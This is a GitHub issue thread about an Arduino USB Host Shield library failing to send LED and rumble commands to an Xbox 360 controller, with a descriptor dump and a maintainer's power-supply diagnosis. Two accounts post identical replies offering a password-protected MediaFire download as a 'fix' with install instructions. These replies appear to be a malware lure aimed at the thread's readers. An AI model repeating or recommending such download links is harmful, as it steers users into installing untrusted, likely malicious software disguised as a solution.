felis/USB_Host_Shield_2.0 #824: Issues sending data to XBox 360 controller

mminella, 2024-08-27:
I have purchased this XBox 360 controller: https://www.amazon.com/dp/B0CC59Z93Q and am using it with an Arduino Mega ADK. I'm currently working on getting it to work with this library. So far I have updated XBOXREC.cpp so that the buttons are recognized correctly (as tested with the XBOXREC.ino example). However, I'm having issues sending data to the controller (changing LED status or rumble). I'm not looking for you to tell me how to do this (since you don't have the controller, I don't expect that), however I'm struggling to understand what's going wrong. I've debugged that on line 366, the rcode results in a 13 (0xD). I can't find any insights into what that actually means or how to fix it. Any help you can provide is appreciated. Thanks in advance!

If this helps, here is the output from USB_desc.ino
```
01
--

Device descriptor: 
Descriptor Length:	12
Descriptor type:	01
USB version:		0200
Device class:		FF
Device Subclass:	FF
Device Protocol:	FF
Max.packet size:	08
Vendor  ID:		045E
Product ID:		028E
Revision ID:		0110
Mfg.string index:	01
Prod.string index:	02
Serial number index:	00
Number of conf.:	01

Configuration descriptor:
Total length:		0031
Num.intf:		01
Conf.value:		01
Conf.string:		00
Attr.:			80
Max.pwr:		32

Interface descriptor:
Intf.number:		00
Alt.:			00
Endpoints:		02
Intf. Class:		FF
Intf. Subclass:		5D
Intf. Protocol:		01
Intf.string:		00
Unknown descriptor:
Length:		11
Type:		21
Contents:	1001012581140303030413020803030705

Endpoint descriptor:
Endpoint address:	81
Attr.:			03
Max.pkt size:		0020
Polling interval:	04

Endpoint descriptor:
Endpoint address:	02
Attr.:			03
Max.pkt size:		0020
Polling interval:	08

Addr:1(0.0.1)
```

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

jia6214876, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

xxxajk, 2024-09-19:
0x0D is hrJERR.

mminella, 2024-09-19:
I was able to figure that out. However, I can't find any insights into what that error actually means, what is actually wrong, or how to fix it.

xxxajk, 2024-09-19:
It's a communications error. How are you powering the mega adk?

mminella, 2024-09-19:
The mega ADK is being powered via USB to my MacBook Pro when I get the error.

xxxajk, 2024-09-19:
Might not be enough current. The controller may be attempting to charge.
See if using a 9V 1A adapter fixes the issue. It normally does.